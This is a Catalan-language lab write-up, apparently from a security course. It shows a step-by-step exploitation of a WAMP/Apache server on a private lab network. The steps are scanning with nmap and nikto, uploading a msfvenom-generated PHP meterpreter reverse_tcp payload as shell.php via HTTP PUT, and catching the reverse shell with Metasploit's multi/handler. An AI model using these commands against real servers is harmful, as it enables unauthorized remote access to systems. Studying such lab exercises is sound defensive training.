# Explotació de servidor web Apache

En aquesta pràctica aprofito una vulnerabilitat del servidor web Apache per crear una *backdoor* i així aconseguir tenir accés a la màquina remota. Comencem!

+ En primer lloc, observem que el port 8585 es troba obert:
> nmap -p8585 -sV 10.0.2.4

> ![](../imatges/apache1.png)
+ Si hi accedim des del navegador web, comprovem que és una interfície WAMP:
> ![](../imatges/apache2.png)
+ Així doncs, revisant la pàgina web, es pot veure que hi ha un enllaç que diu `uploads`:
> ![](../imatges/apache3.png)
+ Com que aquí hi podríem trobar alguna vulnerabilitat, anem a examinar la url utilitzant la comanda *nikto*:
> nikto -h `http://10.0.2.4:8585/uploads/`

> ![](../imatges/apache4.png)
+ Un cop executat, ens fixem en la línia marcada en la imatge, la qual ens diu que hi podem carregar fitxers. D'aquesta manera, hi podríem guardar un arxiu maliciós que ens fos útil a l'hora d'explotar el servei.

+ Per poder fer-ho, ens cal afegir al Firefox l'extensió següent (o qualsevol que ens permeti fer HTTP Requests):
> ![](../imatges/apache5.png)
+ Ara que ja ho tenim instal·lat, ens cal generar el codi maliciós que pujarem a la web. Aquest el crearem mitjançant la comanda `msfvenom` de la següent manera:
> msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.2.15 lport=4444 -f raw

> ![](../imatges/apache6.png)
+ Un cop executat, ens mostrarà per pantalla una sèrie de línies de codi (les seleccionades), les quals haurem de copiar per utilitzar-les quan fem, a continuació, el *request* a la web. Aquí és on utlitzarem l'extensió afegida anteriorment: al camp `target size` hi hem d'escriure la url de la web i el nom de l'arxiu (al meu cas es diu shell.php) on s'hi col·locarà el codi creat. D'altra banda, hem d'escollir el mètode `PUT` i, per últim, al camp body data hi enganxem el codi generat per `msfvenom`:
> ![](../imatges/apache7.png)
+ Quan ho pugem, l'extensió ens ha de respondre el següent, confirmant que s'ha generat correctament:
> ![](../imatges/apache8.png)
+ Si refresquem la pàgina veurem que `shell.php` ja hi apareix:
> ![](../imatges/apache9.png)
+ Arribats a n'aquest punt, ara ens toca seleccionar i configurar l'exploit que utilitzarem:
> use multi/handler

> set payload php/meterpreter/reverse_tcp

> set lhost 10.0.2.15

> set lport 4444

> ![](../imatges/apache10.png)
+ Per últim, executem l'exploit i, a continuació, fem clic a l'arxiu pujat a la web. D'aquesta manera es generarà la connexió inversa, la qual ens donarà accés al sistema:
> exploit

> ![](../imatges/apache11.png)

+ En conclusió, hem aconseguit entrar a un sistema remot mitjançant la pujada d'un fitxer maliciós a un servidor web Apache!